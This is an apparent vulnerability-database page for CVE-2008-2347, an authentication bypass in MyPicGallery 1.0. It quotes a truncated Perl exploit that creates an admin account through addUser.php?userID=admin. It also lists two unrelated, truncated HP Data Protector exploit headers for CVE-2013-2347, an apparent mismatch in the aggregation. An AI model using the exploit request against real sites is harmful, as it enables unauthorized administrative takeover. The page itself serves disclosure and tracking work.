CVE-2008-2347
published 2008-05-20CVE-2008-2347: MyPicGallery 1.0 allows remote attackers to bypass application authentication and gain administrative access by setting the userID parameter to "admin" in a…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.56%
83.1th percentile
MyPicGallery 1.0 allows remote attackers to bypass application authentication and gain administrative access by setting the userID parameter to "admin" in a direct request to admin/addUser.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mypicgallery | mypicgallery | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
exploitdb·2014-03-10
CVE-2013-2347 HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
HP Data Protector - Backup Client Service Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'HP Data Protector Backup Client Service Remote Code Execution',
'Description' => %q{
This module abuses the Backup Client Service (OmniInet.exe) to achieve remote code
execution. The vulnerability exists in the EXEC_BAR operation, which allows to
execute arbitrary processes. This module has been tested successfully on HP Data
Protector 6.20 on Windows 2003 SP2 and Windows 2008 R2.
},
'Author' =>
[
'Aniway.Anyway ', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2347' ],
[ 'BID', '6464
Exploit-DB
HP Data Protector - 'EXEC_BAR' Remote Command Execution
exploitdb·2014-02-16·CVSS 10.0
CVE-2013-2347 [CRITICAL] HP Data Protector - 'EXEC_BAR' Remote Command Execution
HP Data Protector - 'EXEC_BAR' Remote Command Execution
---
import argparse
import socket
"""
Exploit Title: HP Data Protector EXEC_BAR Remote Command Execution
Exploit Author: Chris Graham @cgrahamseven
CVE: CVE-2013-2347
Date: February 14, 2014
Vendor Homepage: www.hp.com
Version: 6.10, 6.11, 6.20
Tested On: Windows Server 2003, Windows Server 2008 R2
References:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422
http://www.zerodayinitiative.com/advisories/ZDI-14-008/
Details:
The omniinet service, which runs by default on port 5555, is susceptible
to numerous remotely exploitable vulnerabilities. By sending a malicious
EXEC_BAR packet (opcode 11), a remote attacker can force the omniinet
service to run an arbitrary command. On Windows, the omnii
Exploit-DB
MyPicGallery 1.0 - Arbitrary Add Admin
exploitdb·2008-05-18
CVE-2008-2347 MyPicGallery 1.0 - Arbitrary Add Admin
MyPicGallery 1.0 - Arbitrary Add Admin
---
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+-\n";
print "-+-- Discovered && Coded By: t0pP8uZz --+-\n";
print "-+-- Discovered On: 16 MAY 2008 / h4ck-y0u, milw0rm --+-\n";
print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+-\n";
print "\nEnter URL(http://site.com): ";
chomp(my $url=);
print "\nEnter Username(create's a admin username): ";
chomp(my $usr=);
print "\nEnter Password(create's a admin password): ";
chomp(my $pwd=);
my $ua = LWP::UserAgent->new( agent => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" );
my $ob = $ua->post( $url."/admin/addUser.php?userID=admin", { "submit" => 1, # ugly?
"fullName" => "null",
"userName" => $usr,
"password" => $pwd,
No writeups or analysis indexed.
2008-05-20
Published